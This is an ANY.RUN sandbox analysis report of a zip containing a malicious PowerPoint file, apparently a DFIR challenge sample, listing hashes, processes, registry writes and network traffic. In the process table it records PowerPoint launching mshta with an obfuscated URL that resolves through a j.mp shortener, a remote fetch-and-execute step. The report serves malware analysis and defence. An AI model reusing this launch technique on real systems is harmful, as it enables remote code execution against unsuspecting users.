File name: RETO-MALWAREDFIR.zip
Full analysis: https://app.any.run/tasks/4167bbc4-9087-442f-86ea-479f91f40dbe
Verdict: Malicious activity
Analysis date: June 18, 2024, 13:28:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5: A333AD0029F525E21B07936689F0371D
SHA1: 6B5A01983F0FDFD5B3CB830D40EAB21B0B0BA09B
SHA256: ACB38A830AA748810AD57280F49F19ADE5D2B81981E742940C37F54A25A97E04
SSDEEP: 768:tHv53y1GR0vK/u7L5ApmKGOBsDjwBJdbVziNe73/tiNelv0SXixkHg:l5yIRJoCWDjwRYe7PtiNysxkA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Unusual execution from MS Office
      • POWERPNT.EXE (PID: 3416)
  • SUSPICIOUS
    • Reads the Internet Settings
      • mshta.exe (PID: 2248)
    • Runs shell command (SCRIPT)
      • POWERPNT.EXE (PID: 3416)
  • INFO
    • Reads Microsoft Office registry keys
      • WinRAR.exe (PID: 3260)
    • Checks proxy server information
      • mshta.exe (PID: 2248)
    • Reads Internet Explorer settings
      • mshta.exe (PID: 2248)
    • Manual execution by a user
      • wmpnscfg.exe (PID: 596)
    • Reads the computer name
      • wmpnscfg.exe (PID: 596)
    • Checks supported languages
      • wmpnscfg.exe (PID: 596)
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: RETO-MALWAREDFIR.ppt
ZipUncompressedSize: 136192
ZipCompressedSize: 44473
ZipCRC: 0x0232f3bb
ZipModifyDate: 2024:02:16 19:03:46
ZipCompression: Deflated
ZipBitFlag: 0x0001
ZipRequiredVersion: 20
Total processes: 45
Monitored processes: 6
Malicious processes: 2
Suspicious processes: 0

Behavior graph (parent → child, as recorded in the process table; "no specs" is the report's label for a process with no signature hits)

start → winrar.exe (no specs) → powerpnt.exe (no specs) → mshta.exe
powerpnt.exe → ping.exe (no specs)
powerpnt.exe → winword.exe (no specs)
start → wmpnscfg.exe (no specs)

Process information

PID | CMD | Path | Indicators | Parent process

3260 | "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\RETO-MALWAREDFIR.zip | C:\Program Files\WinRAR\WinRAR.exe | - | explorer.exe
User: admin | Company: Alexander Roshal | Integrity Level: MEDIUM | Description: WinRAR archiver | Version: 5.91.0
Modules (images):
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3416 | "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\admin\AppData\Local\Temp\Rar$DIb3260.11909\RETO-MALWAREDFIR.ppt" | C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | - | WinRAR.exe
User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Microsoft PowerPoint | Exit code: 0 | Version: 14.0.6009.1000
Modules (images):
c:\program files\microsoft office\office14\powerpnt.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\ppcore.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2248 | mSHtA http://12384928198391823%[email protected]/hdkjashdkasbctdgjsa | C:\Windows\System32\mshta.exe | - | POWERPNT.EXE
User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Microsoft (R) HTML Application host | Exit code: 0 | Version: 11.00.9600.16428 (winblue_gdr.131013-1700)
Modules (images):
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2936 | ping | C:\Windows\System32\PING.EXE | - | POWERPNT.EXE
User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: TCP/IP Ping Command | Exit code: 1 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
540 | winword | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | - | POWERPNT.EXE
User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Microsoft Word | Exit code: 0 | Version: 14.0.6024.1000
Modules (images):
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
596 | "C:\Program Files\Windows Media Player\wmpnscfg.exe" | C:\Program Files\Windows Media Player\wmpnscfg.exe | - | explorer.exe
User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Windows Media Player Network Sharing Service Configuration Application | Exit code: 0 | Version: 12.0.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events: 20 125
Read events: 19 272
Write events: 622
Delete events: 231

Modification events

(PID) Process | Key | Operation | Name | Value

(3260) WinRAR.exe | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes | write | ShellExtBMP | (empty)
(3260) WinRAR.exe | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes | write | ShellExtIcon | (empty)
(3260) WinRAR.exe | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E | write | LanguageList | en-US
(3260) WinRAR.exe | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | write | 3 | C:\Users\admin\Desktop\phacker.zip
(3260) WinRAR.exe | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | write | 2 | C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(3260) WinRAR.exe | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | write | 1 | C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(3260) WinRAR.exe | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | write | 0 | C:\Users\admin\AppData\Local\Temp\RETO-MALWAREDFIR.zip
(3260) WinRAR.exe | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | write | name | 120
(3260) WinRAR.exe | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | write | size | 80
(3260) WinRAR.exe | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | write | type | 120
Executable files: 0
Suspicious files: 10
Text files: 3
Unknown types: 2

Dropped files

PID | Process | Filename | Type

3416 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\CVR22A.tmp.cvr | -
  MD5: - | SHA256: -
540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR1312.tmp.cvr | -
  MD5: - | SHA256: -
2248 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894 | der
  MD5: E38554F956459BAABCF311C568DEFD6E | SHA256: 5204C5678485962D058D97B2AA520B452A3F9CBE030DB41D80C057A1A1C3E143
2248 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894 | binary
  MD5: C1071F4C1BF8A2A956387ECDDA101373 | SHA256: 4D4247AA1897ED9634454C619C236CE66F507683D2AF2AEBD74B279AC7033514
540 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | binary
  MD5: 3362C6398DB5583A37E3567DD874A5D9 | SHA256: 31DD27C9A990922944077CC57C78CD6EB960FD8600BE011408EE2978C9694341
3416 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\~DF182D070E184E6945.TMP | binary
  MD5: BF619EAC0CDF3F68D496EA9344137E8B | SHA256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{820DB3AA-4582-4133-85A9-925D23E43A43}.tmp | binary
  MD5: 5D4D94EE7E06BBB0AF9584119797B23A | SHA256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
2248 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_B5D3A17E5BEDD2EDA793611A0A74E1E8 | binary
  MD5: 51E5569C159FC5843470E454D5D5FDED | SHA256: E8383A5D616F8EA016CF01C51AD78586C56632C21814F161DA42C4B3EE64B14E
2248 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62 | binary
  MD5: 4895022C2F579A75EA5B2079FF1C7BE1 | SHA256: F1F4C6A2A05D585585C0F830A3B75C4090A6C3E9E3C6D637E563497E5CAF5C70
540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{691CA541-F265-49A6-9518-B94DAB7808BB}.tmp | binary
  MD5: 0D18646E0D178B416758DE7E88A6C22E | SHA256: 19D001B8A923DE77F8A017933EF47BB5C9680442A3867864E1E6E021AA96E9DF
HTTP(S) requests: 9
TCP/UDP connections: 17
DNS requests: 12
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation

2248 | mshta.exe | GET | 304 | 104.110.240.224:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?652616f94dd9f09c | unknown | unknown
2248 | mshta.exe | GET | 304 | 104.110.240.209:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?6ccba692cfd50a33 | unknown | unknown
2248 | mshta.exe | GET | 200 | 18.245.39.64:80 | http://ocsp.rootg2.amazontrust.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D | unknown | unknown
1372 | svchost.exe | GET | 200 | 92.123.77.26:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | unknown
2248 | mshta.exe | GET | 200 | 108.138.2.173:80 | http://o.ss2.us//MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D | unknown | unknown
2248 | mshta.exe | GET | 200 | 18.245.39.64:80 | http://ocsp.rootca1.amazontrust.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwdzEjgLnWaIozse2b%2BczaaODg8%3D | unknown | unknown
2248 | mshta.exe | GET | 200 | 67.199.248.17:80 | http://j.mp/hdkjashdkasbctdgjsa | unknown | unknown
1372 | svchost.exe | GET | 200 | 23.34.165.217:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | unknown
1060 | svchost.exe | GET | 304 | 92.123.77.25:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?60bcd71e49d094b3 | unknown | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation

4 | System | 192.168.100.255:137 | - | - | - | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
1060 | svchost.exe | 224.0.0.252:5355 | - | - | - | unknown
1372 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
2248 | mshta.exe | 67.199.248.17:80 | j.mp | GOOGLE-CLOUD-PLATFORM | US | shared
2248 | mshta.exe | 13.33.158.18:443 | d1ayxb9ooonjts.cloudfront.net | - | US | unknown
2248 | mshta.exe | 104.110.240.224:80 | ctldl.windowsupdate.com | Akamai International B.V. | NL | unknown
2248 | mshta.exe | 104.110.240.209:80 | ctldl.windowsupdate.com | Akamai International B.V. | NL | unknown
2248 | mshta.exe | 108.138.2.173:80 | o.ss2.us | AMAZON-02 | US | unknown
2248 | mshta.exe | 18.245.39.64:80 | ocsp.rootg2.amazontrust.com | - | US | unknown

DNS requests

Domain | IP | Reputation

j.mp | 67.199.248.17, 67.199.248.16 | unknown
d1ayxb9ooonjts.cloudfront.net | 13.33.158.18, 13.33.158.128, 13.33.158.108, 13.33.158.220 | whitelisted
ctldl.windowsupdate.com | 104.110.240.209, 104.110.240.224, 92.123.77.25, 92.123.77.35 | whitelisted
o.ss2.us | 108.138.2.173, 108.138.2.107, 108.138.2.10, 108.138.2.195 | whitelisted
ocsp.rootg2.amazontrust.com | 18.245.39.64 | whitelisted
ocsp.rootca1.amazontrust.com | 18.245.39.64 | shared
settings-win.data.microsoft.com | 20.73.194.208 | whitelisted
crl.microsoft.com | 92.123.77.26, 2.19.194.200 | whitelisted
www.microsoft.com | 23.34.165.217 | whitelisted

Threats

No threats detected
No debug info